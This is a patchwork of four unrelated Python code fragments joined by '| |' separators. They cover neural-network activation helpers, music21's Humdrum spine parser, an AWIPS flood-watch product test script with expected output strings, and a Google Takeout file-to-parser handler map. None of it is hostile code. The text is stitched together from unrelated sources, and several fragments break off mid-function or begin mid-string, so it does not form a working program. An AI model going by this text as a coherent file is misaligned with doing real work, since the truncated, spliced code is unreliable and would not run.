def one_vs_all_prediction(prob_matrix):
"""
Compare every probability, get the maximum and output the index.
:param prob_matrix: probability matrix, numpy arrays
:return: prediction generated from probability matrix, numpy arrays
"""
num_of_samples = prob_matrix.shape[1]
prediction = np.argmax(prob_matrix, axis=0)
prediction = np.array([prediction]) # keep dimensions
assert (prediction.shape == (1, num_of_samples))
return prediction
def relu(current_z):
"""
relu function
:param current_z: input A, numpy arrays or numbers
:return: output A, numpy arrays or numbers
"""
current_set = np.maximum(0, current_z)
assert (current_set.shape == current_z.shape)
cache = current_z
return current_set, cache
def relu_backward(d_current_set, cache):
"""
compute gradient of relu function.
:param d_current_set: input dA, numpy arrays or numbers
:param cache: caches with Z, dictionaries
:return: result dZ, numpy arrays or numbers
"""
current_z = cache
dz = np.array(d_current_set, copy=True) # just converting dz to a correct object.
# When z <= 0s you should set dz to 0 as well.
dz[current_z <= 0] = 0
assert (dz.shape == current_z.shape)
return dz
def leaky_relu(current_z):
"""
leaky relu function
:param current_z: input Z, numpy arrays or numbers
:return: result A and caches for following calculation
"""
current_set = np.maximum(0.01 * current_z, current_z)
assert (current_set.shape == current_z.shape)
cache = current_z
return current_set, cache
def leaky_relu_backward(d_current_set, cache):
"""
compute | |
of lines (dataStream) to parse!')
self.parsePositionInStream = 0
self.eventList = []
for line in dataStream:
line = line.rstrip()
if line == "":
continue # technically forbidden by Humdrum but the source of so many errors!
elif re.match(r'\!\!\!', line):
self.eventList.append(GlobalReferenceLine(self.parsePositionInStream, line))
elif re.match(r'\!\!', line): ## find global comments at the top of the line
self.eventList.append(GlobalCommentLine(self.parsePositionInStream, line))
else:
thisLine = SpineLine(self.parsePositionInStream, line)
if thisLine.numSpines > self.maxSpines:
self.maxSpines = thisLine.numSpines
self.eventList.append(thisLine)
self.parsePositionInStream += 1
self.fileLength = self.parsePositionInStream
return self.eventList
def parseProtoSpinesAndEventCollections(self):
r'''
Run after :meth:`~music21.humdrum.spineParser.HumdrumDataCollection.parseEventListFromDataStream()`
to take self.eventList and slice it horizontally
to get self.eventCollections, which is a list of
EventCollection objects, or things that happen simultaneously.
And, more importantly, this method slices self.eventList
vertically to get self.protoSpines which is a list
of ProtoSpines, that is a vertical slice of everything that
happens in a column, regardless of spine-path indicators.
EventCollection objects store global events at the position.
ProtoSpines do not.
So self.eventCollections and self.protoSpines can each be
thought of as a two-dimensional sheet of cells, but where
the first index of the former is the vertical position in
the dataStream and the first index of the later is the
horizontal position in the dataStream. The contents of
each cell is a SpineEvent object or None (if there's no
data at that point). Even '.' (continuation events) get
translated into SpineEvent objects.
Calls :meth:`~music21.humdrum.spineParser.parseEventListFromDataStream`
if it hasn't already been called.
returns a tuple of protoSpines and eventCollections in addition to
setting it in the calling object.
>>> eventString = "!!!COM: Beethoven, Ludwig van\n" + \
... "!! Not really a piece by Beethoven\n" + \
... "**kern\t**dynam\n" + \
... "C4\tpp\n" + \
... "D8\t.\n"
>>> hdc = humdrum.spineParser.HumdrumDataCollection(eventString)
>>> protoSpines, eventCollections = hdc.parseProtoSpinesAndEventCollections()
>>> protoSpines is hdc.protoSpines
True
>>> eventCollections is hdc.eventCollections
True
Looking at individual slices is unlikely to tell you much.
>>> for thisSlice in eventCollections:
... print(thisSlice)
<music21.humdrum.spineParser.EventCollection object at 0x...>
<music21.humdrum.spineParser.EventCollection object at 0x...>
<music21.humdrum.spineParser.EventCollection object at 0x...>
<music21.humdrum.spineParser.EventCollection object at 0x...>
<music21.humdrum.spineParser.EventCollection object at 0x...>
>>> for thisSlice in protoSpines:
... print(thisSlice)
<music21.humdrum.spineParser.ProtoSpine object at 0x...>
<music21.humdrum.spineParser.ProtoSpine object at 0x...>
But looking at the individual slices is revealing:
>>> eventCollections[4].getAllOccurring()
[<music21.humdrum.spineParser.SpineEvent D8>, <music21.humdrum.spineParser.SpineEvent pp>]
'''
if self.eventList == []:
self.parseEventListFromDataStream()
## we make two lists: one of ProtoSpines (vertical slices) and
## one of Events(horizontal slices)
returnProtoSpines = []
returnEventCollections = []
for j in range(0, self.maxSpines):
protoSpineEventList = []
for i in range(0, self.fileLength):
# get the currentEventCollection
if j == 0:
thisEventCollection = EventCollection(self.maxSpines)
returnEventCollections.append(thisEventCollection)
else:
thisEventCollection = returnEventCollections[i]
# parse this cell
if self.eventList[i].isSpineLine is True:
# not a global event
if len(self.eventList[i].spineData) > j:
## are there actually this many spines at this point?
## thus, is there an event here? True
thisEvent = SpineEvent(self.eventList[i].spineData[j])
thisEvent.position = i
thisEvent.protoSpineId = j
if thisEvent.contents in spinePathIndicators:
thisEventCollection.spinePathData = True
protoSpineEventList.append(thisEvent)
thisEventCollection.addSpineEvent(j, thisEvent)
if thisEvent.contents == '.' and i > 0:
lastEvent = returnEventCollections[i-1].events[j]
if lastEvent is not None:
thisEventCollection.addLastSpineEvent(j, returnEventCollections[i-1].getSpineOccurring(j))
else: ## no data here
thisEvent = SpineEvent(None)
thisEvent.position = i
thisEvent.protoSpineId = j
thisEventCollection.addSpineEvent(j, thisEvent)
protoSpineEventList.append(None)
else: ## Global event -- either GlobalCommentLine or GlobalReferenceLine
if j == 0: ## adds to all spines but just runs the first time.
thisEventCollection.addGlobalEvent(self.eventList[i])
thisEvent = SpineEvent(None)
thisEvent.position = i
thisEvent.protoSpineId = j
thisEventCollection.addSpineEvent(j, thisEvent)
protoSpineEventList.append(None)
returnProtoSpines.append(ProtoSpine(protoSpineEventList))
self.protoSpines = returnProtoSpines
self.eventCollections = returnEventCollections
return (returnProtoSpines, returnEventCollections)
def createHumdrumSpines(self, protoSpines = None, eventCollections = None):
'''
Takes the data from the object's protoSpines and eventCollections
and returns a :class:`~music21.humdrum.spineParser.SpineCollection`
object that contains HumdrumSpine() objects.
A HumdrumSpine object differs from a ProtoSpine in that it follows
spinePathData -- a ProtoSpine records all data in a given tab
position, and thus might consist of data from several
spines that move around. HumdrumSpines are smart enough not to
have this limitation.
When we check for spinePathData we look for the following spine
path indicators (from HumdrumDoc)::
*+ add a new spine (to the right of the current spine)
*- terminate a current spine
*^ split a spine (into two)
*v join (two or more) spines into one
*x exchange the position of two spines
* do nothing
'''
if protoSpines == None or eventCollections == None:
protoSpines = self.protoSpines
eventCollections = self.eventCollections
maxSpines = len(protoSpines)
# currentSpineList is a list of currently active
# spines ordered from left to right.
currentSpineList = common.defaultlist(lambda:None)
spineCollection = SpineCollection()
# go through the event collections line by line
for i in range(0, self.fileLength):
thisEventCollection = eventCollections[i]
for j in range(0, maxSpines):
thisEvent = protoSpines[j].eventList[i]
if thisEvent is not None: # something there
currentSpine = currentSpineList[j]
if currentSpine is None:
## first event after a None = new spine because
## Humdrum does not require *+ at the beginning
currentSpine = spineCollection.addSpine()
currentSpine.insertPoint = i
currentSpineList[j] = currentSpine
currentSpine.append(thisEvent)
# currentSpine.id is always unique in a spineCollection
thisEvent.protoSpineId = currentSpine.id
# check for spinePathData
# note that nothing else can happen in an eventCollection
# except spine path data if any spine has spine path data.
# thus, this is illegal. The C#4 will be ignored:
# *x *x C#4
if thisEventCollection.spinePathData is True:
newSpineList = common.defaultlist(lambda:None)
mergerActive = False
exchangeActive = False
for j in range(0, maxSpines):
thisEvent = protoSpines[j].eventList[i]
currentSpine = currentSpineList[j]
if thisEvent is None and currentSpine is not None:
## should this happen?
newSpineList.append(currentSpine)
elif thisEvent is None:
continue
elif thisEvent.contents == "*-": ## terminate spine
currentSpine.endingPosition = i
elif thisEvent.contents == "*^": ## split spine assume they are voices
newSpine1 = spineCollection.addSpine(streamClass = stream.Voice)
newSpine1.insertPoint = i+1
newSpine1.parentSpine = currentSpine
newSpine1.isFirstVoice = True
newSpine2 = spineCollection.addSpine(streamClass = stream.Voice)
newSpine2.insertPoint = i+1
newSpine2.parentSpine = currentSpine
currentSpine.endingPosition = i # will be overridden if merged
currentSpine.childSpines.append(newSpine1)
currentSpine.childSpines.append(newSpine2)
currentSpine.childSpineInsertPoints[i] = (newSpine1, newSpine2)
newSpineList.append(newSpine1)
newSpineList.append(newSpine2)
elif thisEvent.contents == "*v": #merge spine -- n.b. we allow non-adjacent lines to be merged. this is incorrect
if mergerActive is False: # per humdrum syntax, but is easily done.
# assume that previous spine continues
if currentSpine.parentSpine is not None:
mergerActive = currentSpine.parentSpine
else:
mergerActive = True
currentSpine.endingPosition = i
else: ## if second merger code is not found then a one-to-one spine "merge" occurs
currentSpine.endingPosition = i
# merge back to parent if possible:
if currentSpine.parentSpine is not None:
newSpineList.append(currentSpine.parentSpine)
# or merge back to other spine's parent:
elif mergerActive is not True: # other spine parent set
newSpineList.append(mergerActive)
# or make a new spine...
else:
s = spineCollection.addSpine(streamClass = stream.Part)
s.insertPoint = i
newSpineList.append(s)
mergerActive = False
elif thisEvent.contents == "*x": # exchange spine
if exchangeActive is False:
exchangeActive = currentSpine
else: ## if second exchange is not found, then both lines disappear and exception is raised
## n.b. we allow more than one PAIR of exchanges in a line so long as the first
## is totally finished by the time the second happens
newSpineList.append(currentSpine)
newSpineList.append(exchangeActive)
exchangeActive = False
else: ## null processing code "*"
newSpineList.append(currentSpine)
if exchangeActive is not False:
raise HumdrumException("ProtoSpine found with unpaired exchange instruction at line %d [%s]" % (i, thisEventCollection.events))
currentSpineList = newSpineList
return spineCollection
def insertGlobalEvents(self):
'''
Insert the Global Events (GlobalReferenceLines and GlobalCommentLines) into an appropriate
place in the outer Stream.
Run after self.spineCollection.createMusic21Streams(). Is run automatically by self.parseLines().
uses self.spineCollection.getOffsetsAndPrioritiesByPosition()
'''
if hasattr(self, 'globalEventsInserted') and self.globalEventsInserted is True:
return
self.globalEventsInserted = True
positionDict = self.spineCollection.getOffsetsAndPrioritiesByPosition()
eventList = self.eventList
maxEventList = len(eventList)
numberOfGlobalEventsInARow = 0
insertList = []
appendList = []
for i, event in enumerate(eventList):
if event.isSpineLine is False:
numberOfGlobalEventsInARow += 1
insertOffset = None
insertPriority = 0
for j in range(i+1, maxEventList):
if j in positionDict:
insertOffset = positionDict[j][0]
# hopefully not more than 20 events in a row...
insertPriority = positionDict[j][1][0].priority - 40 + numberOfGlobalEventsInARow
break
if event.isReference is True:
# TODO: Fix GlobalReference
el = GlobalReference(event.code, event.value)
else:
el = GlobalComment(event.value)
| |
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
# ----------------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without technical
# support, and with no warranty, express or implied, as to its usefulness for
# any purpose.
#
# Headlines Timing
#
# Author:
# ----------------------------------------------------------------------------
#set up to test area names and part of states
# without locationName defined
areaT1 = """
AreaDictionary['FLZ050']['fullStateName'] = 'Florida'
AreaDictionary['FLZ050']['partOfState'] = 'western'
AreaDictionary['FLZ057']['fullStateName'] = 'Florida'
AreaDictionary['FLZ057']['partOfState'] = 'western'
AreaDictionary['FLZ160']['fullStateName'] = 'Florida'
AreaDictionary['FLZ160']['partOfState'] = 'central'
AreaDictionary['FLZ151']['fullStateName'] = 'Florida'
AreaDictionary['FLZ151']['partOfState'] = 'central'
AreaDictionary['FLZ043']['fullStateName'] = 'Florida'
AreaDictionary['FLZ043']['partOfState'] = 'central'
AreaDictionary['FLZ162']['fullStateName'] = 'Florida'
AreaDictionary['FLZ162']['partOfState'] = 'central'
AreaDictionary['FLZ165']['fullStateName'] = 'Florida'
AreaDictionary['FLZ165']['partOfState'] = 'central'
AreaDictionary['FLZ056']['fullStateName'] = 'Florida'
AreaDictionary['FLZ056']['partOfState'] = 'southern'
AreaDictionary['FLZ052']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ052']['partOfState'] = 'western'
AreaDictionary['FLZ155']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ155']['partOfState'] = 'western'
AreaDictionary['FLZ061']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ061']['partOfState'] = 'southern'
AreaDictionary['FLZ148']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ148']['partOfState'] = 'southern'
AreaDictionary['FLZ142']['fullStateName'] = 'South Carolina'
AreaDictionary['FLZ142']['partOfState'] = 'western'
AreaDictionary['FLZ043']['fullStateName'] = 'South Carolina'
AreaDictionary['FLZ043']['partOfState'] = 'western'
"""
#with location name defined
areaT2= """
AreaDictionary['FLZ050']['fullStateName'] = 'Florida'
AreaDictionary['FLZ050']['partOfState'] = 'western'
AreaDictionary['FLZ050']['locationName'] = 'Clearfield'
AreaDictionary['FLZ057']['fullStateName'] = 'Florida'
AreaDictionary['FLZ057']['partOfState'] = 'western'
AreaDictionary['FLZ057']['locationName'] = 'Clearfield'
AreaDictionary['FLZ160']['fullStateName'] = 'Florida'
AreaDictionary['FLZ160']['partOfState'] = 'central'
AreaDictionary['FLZ160']['locationName'] = 'Aunt Ruby'
AreaDictionary['FLZ151']['fullStateName'] = 'Florida'
AreaDictionary['FLZ151']['partOfState'] = 'central'
AreaDictionary['FLZ151']['locationName'] = 'Aunt Ruby'
AreaDictionary['FLZ043']['fullStateName'] = 'Florida'
AreaDictionary['FLZ043']['partOfState'] = 'central'
AreaDictionary['FLZ043']['locationName'] = 'Adams'
AreaDictionary['FLZ162']['fullStateName'] = 'Florida'
AreaDictionary['FLZ162']['partOfState'] = 'central'
AreaDictionary['FLZ162']['locationName'] = 'Adams'
AreaDictionary['FLZ165']['fullStateName'] = 'Florida'
AreaDictionary['FLZ165']['partOfState'] = 'central'
#AreaDictionary['FLZ165']['locationName'] = 'western'
AreaDictionary['FLZ056']['fullStateName'] = 'Florida'
AreaDictionary['FLZ056']['partOfState'] = 'southern'
AreaDictionary['FLZ056']['locationName'] = 'Tampa'
AreaDictionary['FLZ052']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ052']['partOfState'] = 'western'
AreaDictionary['FLZ052']['locationName'] = 'Tampa'
AreaDictionary['FLZ155']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ155']['partOfState'] = 'western'
AreaDictionary['FLZ155']['locationName'] = 'Atlanta'
AreaDictionary['FLZ061']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ061']['partOfState'] = 'southern'
AreaDictionary['FLZ061']['locationName'] = 'Beach'
AreaDictionary['FLZ148']['fullStateName'] = 'Georgia'
AreaDictionary['FLZ148']['partOfState'] = 'southern'
AreaDictionary['FLZ148']['locationName'] = 'Beach'
AreaDictionary['FLZ142']['fullStateName'] = 'South Carolina'
AreaDictionary['FLZ142']['partOfState'] = 'western'
AreaDictionary['FLZ142']['locationName'] = 'South Park'
AreaDictionary['FLZ043']['fullStateName'] = 'South Carolina'
AreaDictionary['FLZ043']['partOfState'] = 'western'
AreaDictionary['FLZ043']['locationName'] = 'South Park'
"""
#for testing of parishes, counties, and areas
areaT3 = """
AreaDictionary['FLC017']['fullStateName'] = 'Louisiana'
AreaDictionary['FLC017']['partOfState'] = 'western'
AreaDictionary['FLC017']['independentCity'] = 1
AreaDictionary['FLC105']['fullStateName'] = 'Louisiana'
AreaDictionary['FLC105']['partOfState'] = 'western'
AreaDictionary['FLC027']['fullStateName'] = 'Louisiana'
AreaDictionary['FLC027']['partOfState'] = 'western'
AreaDictionary['FLC053']['fullStateName'] = 'Florida'
AreaDictionary['FLC053']['partOfState'] = 'western'
"""
areaT3FIPS0= '#Definition["areaType"] = "FIPS"'
areaT3FIPS1= 'Definition["areaType"] = "FIPS"'
scripts = [
{
"commentary": "Clear out all Hazards Table and Grids.",
"name": "Hazard_FFA_0",
"productType": None,
"clearHazardsTable": 1,
"checkStrings": [],
},
{
"commentary": "NEW FFA",
"name": "Hazard_FFA_1",
"drtTime": "20100101_0510",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'ER '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 0, 3, "FA.A", ["FLZ149"]),
],
"checkStrings": ["URGENT - IMMEDIATE BROADCAST REQUESTED",
"Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ149-",
"/X.NEW.KTBW.FA.A.0001.100101T0510Z-100101T0800Z/",
"/00000.0.ER.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"Coastal Pasco-",
"1210 AM EST Fri Jan 1 2010",
"...FLOOD WATCH IN EFFECT UNTIL 3 AM EST EARLY THIS MORNING...",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flood Watch for a portion of west central Florida, including the following area, Coastal Pasco.",
"* Until 3 AM EST early this morning",
],
},
{
"commentary": "CON FFA",
"name": "Hazard_FFA_2",
"drtTime": "20100101_0530",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'SM '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 0, 3, "FA.A", ["FLZ149"]),
],
"checkStrings": ["Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ149-",
"/X.CON.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/00000.0.SM.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH REMAINS IN EFFECT UNTIL 3 AM EST EARLY THIS MORNING...",
"The Flood Watch continues for",
"* A portion of west central Florida, including the following area, Coastal Pasco.",
"* Until 3 AM EST early this morning",
],
},
{
"commentary": "EXA FFA",
"name": "Hazard_FFA_3",
"drtTime": "20100101_0700",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'DM '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 0, 3, "FA.A", ["FLZ149","FLZ057"]),
],
"checkStrings": ["URGENT - IMMEDIATE BROADCAST REQUESTED",
"Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ057-",
"/X.EXA.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/00000.0.DM.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH IN EFFECT UNTIL 3 AM EST EARLY THIS MORNING...",
"The National Weather Service in Tampa Bay Ruskin has expanded the",
"* Flood Watch to include a portion of south central Florida, including the following area, Highlands.",
"* Until 3 AM EST early this morning",
"FLZ149-",
"/X.CON.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/00000.0.DM.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH REMAINS IN EFFECT UNTIL 3 AM EST EARLY THIS MORNING...",
"The Flood Watch continues for",
"* A portion of west central Florida, including the following area, Coastal Pasco.",
"* Until 3 AM EST early this morning",
],
},
{
"commentary": "CAN FFA, NEW FFA",
"name": "Hazard_FFA_4",
"drtTime": "20100101_0720",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'IJ '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 0, 8, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 24, 32, "FF.A", ["FLZ057"]),
],
"checkStrings": ["URGENT - IMMEDIATE BROADCAST REQUESTED",
"Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ057-",
"/X.CAN.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/X.NEW.KTBW.FF.A.0001.100101T0720Z-100101T1300Z/",
"/X.NEW.KTBW.FF.A.0002.100102T0500Z-100102T1300Z/",
"/00000.0.IJ.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLASH FLOOD WATCH IN EFFECT UNTIL 8 AM EST THIS MORNING...",
"...FLASH FLOOD WATCH IN EFFECT FROM LATE TONIGHT THROUGH SATURDAY MORNING...",
"...FLOOD WATCH IS CANCELLED...",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flash Flood Watch for a portion of south central Florida, including the following area, Highlands.",
"* Until 8 AM EST this morning",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flash Flood Watch for a portion of south central Florida, including the following area, Highlands.",
"* From late tonight through Saturday morning",
"The Flood Watch for a portion of south central Florida has been cancelled.",
"FLZ149-",
"/X.CAN.KTBW.FA.A.0001.000000T0000Z-100101T0800Z/",
"/00000.0.IJ.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH IS CANCELLED...",
"The Flood Watch for a portion of west central Florida has been cancelled."
],
},
{
"commentary": "EXP FFA, 2 NEW FFA",
"name": "Hazard_FFA_5",
"drtTime": "20100101_1300",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'FS '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 24, 32, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 46, 62, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 45, 46, "FA.A", ["FLZ149"]),
("Fcst", "Hazards", "DISCRETE", 46, 62, "FA.A", ["FLZ149"]),
("Fcst", "Hazards", "DISCRETE", 62, 68, "FA.A", ["FLZ149"]),
],
"checkStrings": ["URGENT - IMMEDIATE BROADCAST REQUESTED",
"Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ057-",
"/X.EXP.KTBW.FF.A.0001.000000T0000Z-100101T1300Z/",
"/X.NEW.KTBW.FF.A.0003.100103T0300Z-100103T1900Z/",
"/X.CON.KTBW.FF.A.0002.100102T0500Z-100102T1300Z/",
"/00000.0.FS.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLASH FLOOD WATCH REMAINS IN EFFECT FROM LATE TONIGHT THROUGH SATURDAY MORNING...",
"...FLASH FLOOD WATCH IN EFFECT FROM SATURDAY EVENING THROUGH SUNDAY AFTERNOON...",
"...FLASH FLOOD WATCH HAS EXPIRED...",
"The Flash Flood Watch continues for",
"* A portion of south central Florida, including the following area, Highlands.",
"* From late tonight through Saturday morning",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flash Flood Watch for a portion of south central Florida, including the following area, Highlands.",
"* From Saturday evening through Sunday afternoon",
"The Flash Flood Watch for a portion of south central Florida has expired.",
"FLZ149-",
"/X.NEW.KTBW.FA.A.0002.100103T0200Z-100104T0100Z/",
"/00000.0.FS.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH IN EFFECT FROM SATURDAY EVENING THROUGH SUNDAY EVENING...",
"The National Weather Service in Tampa Bay Ruskin has issued a",
"* Flood Watch for a portion of west central Florida, including the following area, Coastal Pasco.",
"* From Saturday evening through Sunday evening",
],
},
{
"commentary": "CON test of multiple events",
"name": "Hazard_FFA_6",
"drtTime": "20100102_0300",
"productType": "Hazard_FFA_Local",
"cmdLineVars": "{('Flood Reason', 'floodReason'): 'RS '}",
"createGrids": [
("Fcst", "Hazards", "DISCRETE", -100, 100, "<None>", "all"),
("Fcst", "Hazards", "DISCRETE", 24, 32, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 46, 62, "FF.A", ["FLZ057"]),
("Fcst", "Hazards", "DISCRETE", 45, 46, "FA.A", ["FLZ149"]),
("Fcst", "Hazards", "DISCRETE", 46, 62, "FA.A", ["FLZ149"]),
("Fcst", "Hazards", "DISCRETE", 62, 68, "FA.A", ["FLZ149"]),
],
"checkStrings": ["Flood Watch",
"National Weather Service Tampa Bay Ruskin FL",
"FLZ057-",
"/X.CON.KTBW.FF.A.0002.100102T0500Z-100102T1300Z/",
"/X.CON.KTBW.FF.A.0003.100103T0300Z-100103T1900Z/",
"/00000.0.RS.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLASH FLOOD WATCH REMAINS IN EFFECT UNTIL 8 AM EST SATURDAY...",
"...FLASH FLOOD WATCH REMAINS IN EFFECT FROM SATURDAY EVENING THROUGH SUNDAY AFTERNOON...",
"The Flash Flood Watch continues for",
"* A portion of south central Florida, including the following area, Highlands.",
"* Until 8 AM EST Saturday",
"The Flash Flood Watch continues for",
"* A portion of south central Florida, including the following area, Highlands.",
"* From Saturday evening through Sunday afternoon",
"FLZ149-",
"/X.CON.KTBW.FA.A.0002.100103T0200Z-100104T0100Z/",
"/00000.0.RS.000000T0000Z.000000T0000Z.000000T0000Z.OO/",
"...FLOOD WATCH REMAINS IN EFFECT FROM SATURDAY EVENING THROUGH SUNDAY EVENING...",
"The Flood Watch continues for",
"* A portion of west central Florida, including the following area, Coastal Pasco.",
| |
"""
This handles mapping the filenames in the export
to the corresponding functions and caching the results
"""
import os
import re
from pathlib import Path
from typing import (
Iterator,
Dict,
Callable,
Any,
Optional,
List,
Type,
Tuple,
cast,
)
from collections import defaultdict
from cachew import cachew
from .compat import Literal
from .common import Res, PathIsh
from .cache import takeout_cache_path
from .log import logger
from .models import BaseEvent
from .parse_html.activity import _parse_html_activity
from .parse_html.comment import _parse_html_comment_file
from .parse_json import (
_parse_likes,
_parse_app_installs,
_parse_json_activity,
_parse_location_history,
_parse_chrome_history,
)
# anything that subclasses BaseEvent
BaseResults = Iterator[Res[BaseEvent]]
HandlerFunction = Callable[[Path], BaseResults]
HandlerMap = Dict[str, Optional[HandlerFunction]]
_CacheKeySingle = Type[BaseEvent]
CacheKey = _CacheKeySingle
def _cache_key_to_str(c: CacheKey) -> str:
return str(c.__name__).casefold()
def _parse_handler_return_type(handler: HandlerFunction) -> CacheKey:
assert hasattr(
handler, "return_type"
), f"Handler functions should have an 'return_type' property which specifies what types this produces. See parse_json.py for an example. No 'return_type' on {handler}"
val: Any = getattr(handler, "return_type")
assert isinstance(val, type), f"{val} is not a type"
assert BaseEvent in val.__mro__, f"{val} not a subclass of BaseEvent"
return cast(_CacheKeySingle, val)
# If parsed, should mention:
# Google Help Communities
# - Select JSON as Output
# Google Play Books
# - Select JSON as Output
# Google Play Games Services
# - Select JSON as Output
# Google Play Movies & TV options
# - Select JSON as Output
# Profile
# - Select JSON as Output
# Note: when I say 'no info here' or 'not useful', is just how the
# data appears in my export. It might be useful for you -- if so
# feel free to make a PR or an issue to parse it
#
# Can also extend or overwrite these functions by passing
# 'None' if you don't want a certain part to be parsed,
# or by passing your own function which parses the file something from models.py
# Reminder that dicts are ordered, so order here can matter
# If you want to parse one file from a folder with lot of files, can
# specify that file, and then on the next line specify 'None'
# for the folder, ignoring the rest of files
# Setting 'None' in the handler map specifies that we should ignore this file
DEFAULT_HANDLER_MAP: HandlerMap = {
r"Chrome/BrowserHistory.json": _parse_chrome_history,
r"Chrome": None, # Ignore rest of Chrome stuff
r"Google Play Store/Installs.json": _parse_app_installs,
r"Google Play Store/": None, # ignore anything else in Play Store
r"Location History/Semantic Location History/.*": None, # not that much data here. maybe parse it?
# optional space to handle pre-2017 data
r"Location History/Location( )?History.json": _parse_location_history, # old path to Location History
r"Location History/Records.json": _parse_location_history, # new path to Location History
r"Location History/Settings.json": None,
# HTML/JSON activity-like files which aren't in 'My Activity'
# optional " and Youtube Music" to handle pre-2017 data
r"YouTube( and YouTube Music)?/history/.*?.html": _parse_html_activity,
r"YouTube( and YouTube Music)?/history/.*?.json": _parse_json_activity,
# basic list item files which have chat messages/comments
r"YouTube( and YouTube Music)?/my-comments/.*?.html": _parse_html_comment_file,
r"YouTube( and YouTube Music)?/my-live-chat-messages/.*?.html": _parse_html_comment_file,
r"YouTube( and YouTube Music)?/playlists/likes.json": _parse_likes,
r"YouTube( and YouTube Music)?/playlists/": None,
r"YouTube( and YouTube Music)?/subscriptions": None,
r"YouTube( and YouTube Music)?/videos": None,
r"YouTube( and YouTube Music)?/music-uploads": None,
r"My Activity/Assistant/.*.mp3": None, # might be interesting to extract timestamps
r"My Activity/Voice and Audio/.*.mp3": None,
r"My Activity/Takeout": None, # activity for when you made takeouts, dont need
# HTML 'My Activity' Files
r"My Activity/.*?My\s*Activity.html": _parse_html_activity,
r"My Activity/.*?My\s*Activity.json": _parse_json_activity,
# Maybe parse these?
r"Access Log Activity": None,
r"Assistant Notes and Lists/.*.csv": None,
r"Blogger/Comments/.*?feed.atom": None,
r"Blogger/Blogs/": None,
# Fit has possibly interesting data
# Fit/Daily activity metrics/2015-07-27.csv
# Fit/Activities/2017-10-29T23_08_59Z_PT2M5.699S_Other.tcx
# Fit/All Data/derived_com.google.calories.bmr_com.google.and.json
r"Fit/": None,
r"Groups": None,
r"Google Play Games Services/Games/.*/(Achievements|Activity|Experience|Scores).html": None,
r"Hangouts": None,
r"Keep": None,
r"Maps (your places)": None,
r"My Maps/.*.kmz": None, # custom KML maps
r"Saved/.*.csv": None, # lists with saved places from Google Maps
r"Shopping Lists/.*.csv": None,
r"Tasks": None,
# Files to ignore
r"Android Device Configuration Service/": None,
r"Blogger/Albums/": None,
r"Blogger/Profile/": None,
r"Calendar/": None,
r"Cloud Print/": None,
r"Contacts/": None,
r"Drive/": None,
r"Google Account/": None,
r"Google Business Profile/": None,
r"Google My Business/": None,
r"Google Pay/": None,
r"Google Photos/": None, # has images/some metadata on each of them
r"Google Play Books/.*.pdf": None,
r"Google Play Games Services/Games/.*/(Data.bin|Metadata.html)": None,
r"Google Play Movies.*?/": None,
r"Google Shopping/": None,
r"Google Store/": None,
r"Google Translator Toolkit/": None,
r"Google Workspace Marketplace/": None,
